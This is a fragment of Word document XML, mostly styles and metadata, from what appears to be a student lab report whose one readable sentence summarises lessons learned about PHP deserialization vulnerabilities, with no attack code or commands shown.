        </w:rPr>
        <w:t>本次实验学习到了反序列化的执行过程，通过更改screenName的不同value值，实现了各种执行效果。了解到了php反序列化漏洞的基本原理，能够熟练分析php文件，进一步提升web渗透实战能力。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="003410D5" w:rsidRPr="00341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F5469"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F53A50CE"/>
    <w:lvl w:ilvl="0" w:tplc="6EB6CB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EF4E87"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D958A53C"/>
    <w:lvl w:ilvl="0" w:tplc="F14EE8F6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52A4233F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6E7601AE"/>
    <w:lvl w:ilvl="0" w:tplc="CDB8974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719104CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E5D8475C"/>
    <w:lvl w:ilvl="0" w:tplc="2F8A43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654986623">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1108738962">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1487084651">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="935483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8D5"/>
    <w:rsid w:val="000203D0"/>
    <w:rsid w:val="00025F52"/>
    <w:rsid w:val="0003633E"/>
    <w:rsid w:val="000732D3"/>
    <w:rsid w:val="0008379F"/>
    <w:rsid w:val="00120BC6"/>
    <w:rsid w:val="00132656"/>
    <w:rsid w:val="00137CC2"/>
    <w:rsid w:val="00145E79"/>
    <w:rsid w:val="001645A4"/>
    <w:rsid w:val="001A1E97"/>
    <w:rsid w:val="001B1A00"/>
    <w:rsid w:val="001D2596"/>
    <w:rsid w:val="001D6259"/>
    <w:rsid w:val="001F3D8D"/>
    <w:rsid w:val="00222434"/>
    <w:rsid w:val="002410C6"/>
    <w:rsid w:val="002A0874"/>
    <w:rsid w:val="002C6140"/>
    <w:rsid w:val="00305098"/>
    <w:rsid w:val="003410D5"/>
    <w:rsid w:val="00397FC8"/>
    <w:rsid w:val="003B6DC8"/>
    <w:rsid w:val="003D713D"/>
    <w:rsid w:val="00435627"/>
    <w:rsid w:val="00465792"/>
    <w:rsid w:val="004718C1"/>
    <w:rsid w:val="00485DF0"/>
    <w:rsid w:val="004B1C8A"/>
    <w:rsid w:val="004E3F1E"/>
    <w:rsid w:val="00500EDD"/>
    <w:rsid w:val="00523B5F"/>
    <w:rsid w:val="00533AF1"/>
    <w:rsid w:val="0055132D"/>
    <w:rsid w:val="0056392B"/>
    <w:rsid w:val="005A3D27"/>
    <w:rsid w:val="005B0F4D"/>
    <w:rsid w:val="005D53E6"/>
    <w:rsid w:val="005E5221"/>
    <w:rsid w:val="00626B35"/>
    <w:rsid w:val="00626EB2"/>
    <w:rsid w:val="00631B15"/>
    <w:rsid w:val="00644F80"/>
    <w:rsid w:val="00656EDD"/>
    <w:rsid w:val="0066715D"/>
    <w:rsid w:val="00677B73"/>
    <w:rsid w:val="00713047"/>
    <w:rsid w:val="007358B4"/>
    <w:rsid w:val="00755AC7"/>
    <w:rsid w:val="00757047"/>
    <w:rsid w:val="00772E5E"/>
    <w:rsid w:val="00801DC3"/>
    <w:rsid w:val="0085415D"/>
    <w:rsid w:val="00867842"/>
    <w:rsid w:val="00897144"/>
    <w:rsid w:val="008E3868"/>
    <w:rsid w:val="009110E0"/>
    <w:rsid w:val="0097746C"/>
    <w:rsid w:val="00994FF3"/>
    <w:rsid w:val="009B41F2"/>
    <w:rsid w:val="009E7CAC"/>
    <w:rsid w:val="00A34B98"/>
    <w:rsid w:val="00A72ADA"/>
    <w:rsid w:val="00A87A52"/>
    <w:rsid w:val="00AC73EB"/>
    <w:rsid w:val="00AE0490"/>
    <w:rsid w:val="00AE5D96"/>
    <w:rsid w:val="00AE7E53"/>
    <w:rsid w:val="00B9023D"/>
    <w:rsid w:val="00BB11C9"/>
    <w:rsid w:val="00C07C74"/>
    <w:rsid w:val="00C20B6B"/>
    <w:rsid w:val="00C259D4"/>
    <w:rsid w:val="00C5562C"/>
    <w:rsid w:val="00C94B92"/>
    <w:rsid w:val="00C973D9"/>
    <w:rsid w:val="00CB3964"/>
    <w:rsid w:val="00CC1140"/>
    <w:rsid w:val="00CF4DE4"/>
    <w:rsid w:val="00D07CA5"/>
    <w:rsid w:val="00DF6678"/>
    <w:rsid w:val="00E158D5"/>
    <w:rsid w:val="00E15A37"/>
    <w:rsid w:val="00E414B1"/>
    <w:rsid w:val="00E62AD3"/>
    <w:rsid w:val="00EC20EC"/>
    <w:rsid w:val="00F13E66"/>
    <w:rsid w:val="00F7731A"/>
    <w:rsid w:val="00FB2DC9"/>
    <w:rsid w:val="00FC1B64"/>
    <w:rsid w:val="00FF4E68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CBD59"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B731395E-972A-4A4B-B928-66E47BA50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7CAC"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing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2410C6"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl/>
      <w:spacing w:before="340" w:after="330" w:line="578" w:lineRule="auto"/>
      <w:ind w:firstLineChars="200" w:firstLine="200"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"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2410C6"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl/>
      <w:spacing w:before="260" w:after="260" w:line="416" w:lineRule="auto"/>
      <w:ind w:firstLineChars="200" w:firstLine="200"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi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10C6"/>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"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2410C6"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"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2410C6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="宋体" w:hAnsiTheme="majorHAnsi"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2410C6"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="21"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00626B35"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="a6">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="000732D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702</Words>
  <Characters>4006</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>33</Lines>
  <Paragraphs>9</Paragraphs>
  <ScaleCrop>false</ScaleCrop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1153486883@qq.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>1153486883@qq.com</cp:lastModifiedBy>
  <cp:revision>37</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-24T15:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-25T22:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>